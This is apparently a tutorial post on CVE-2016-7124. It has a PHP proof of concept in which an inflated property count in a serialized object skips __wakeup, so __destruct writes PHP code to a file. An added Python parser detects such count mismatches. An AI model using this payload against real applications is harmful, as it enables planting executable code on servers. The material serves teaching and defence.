0x01 Basic principle

CVE-2016-7124, simply put: when the value in a serialized string that states the number of object properties is greater than the actual number of properties present, the call to __wakeup is skipped. Demo below:

0x02 Code demonstration

<?php
/**
 * Created by PhpStorm.
 * User: 徐超
 * Date: 2018/10/20
 * Time: 08:15 PM
 */

class test{
    var $a = "phpinfo();";
    public function __wakeup()
    {
        // Runs after unserialize() when the property count in the payload is
        // honest; it clears $a so that __destruct has nothing to write.
        $this->a = null;
    }
    public function __destruct()
    {
        // Writes whatever is left in $a to disk when the object is released.
        $fp = fopen("D:\\wakeup.php","w");
        fputs($fp,$this->a);
        fclose($fp);
    }

}
// $b = new test();
//$c = serialize($b);

$d = 'O:4:"test":2:{s:1:"a";s:16:"<?php phpinfo();";}'; # declared property count (2) is larger than the real count (1): __wakeup is skipped and the payload is written to the file
//$d = 'O:4:"test":1:{s:1:"a";s:16:"<?php phpinfo();";}';  # normally generated serialized PHP data -->> file content is empty
$e = unserialize($d);
echo "\n\r";
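As an added defensive example that is not part of the original post, the following Python parser for the PHP serialize() format reports every object or array whose declared member count differs from the members actually present, which is exactly the mismatch in $d above; input rejected this way never reaches unserialize() on an unpatched PHP (before 5.6.25 / 7.0.10). It assumes ASCII input; decode raw bytes with latin-1 so the s:<len> fields count bytes.

```python
# Added example: flags containers whose declared member count (the "2" in
# O:4:"test":2:{...}) does not match the members actually present.
class PhpSerializeError(ValueError):
    pass

def _parse(s, i, issues):
    """Parse one value at s[i:], return (value, index after it)."""
    t = s[i]
    if t == 'N':                                   # N;
        return None, i + 2
    if t in 'ibd':                                 # i:42;  b:1;  d:1.5;
        end = s.index(';', i)
        raw = s[i + 2:end]
        return (float(raw) if t == 'd' else int(raw)), end + 1
    if t == 's':                                   # s:<len>:"<bytes>";
        colon = s.index(':', i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                          # skip :"
        if s[start + n:start + n + 2] != '";':
            raise PhpSerializeError('string length mismatch at %d' % i)
        return s[start:start + n], start + n + 2
    if t in 'aO':                  # a:<n>:{...}   O:<len>:"<class>":<n>:{...}
        j, name = i + 2, 'array'
        if t == 'O':
            colon = s.index(':', j)
            n = int(s[j:colon])
            name = s[colon + 2:colon + 2 + n]
            j = colon + 2 + n + 2                  # skip closing quote and ':'
        colon = s.index(':', j)
        declared = int(s[j:colon])
        if s[colon + 1] != '{':
            raise PhpSerializeError("expected '{' at %d" % (colon + 1))
        j, members = colon + 2, {}
        while s[j] != '}':                         # key;value pairs until '}'
            key, j = _parse(s, j, issues)
            val, j = _parse(s, j, issues)
            members[key] = val
        if declared != len(members):               # the CVE-2016-7124 trigger
            issues.append((name, declared, len(members)))
        return ((name, members) if t == 'O' else members), j + 1
    raise PhpSerializeError('unsupported type %r at %d' % (t, i))

def check_member_counts(serialized):
    """Return [(class or 'array', declared, actual), ...]; empty means OK."""
    issues = []
    _, end = _parse(serialized, 0, issues)
    if end != len(serialized):
        raise PhpSerializeError('trailing data at %d' % end)
    return issues
```

Nested containers are checked too, so a mismatch hidden inside an array element is reported with the class name of the object that carries it.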
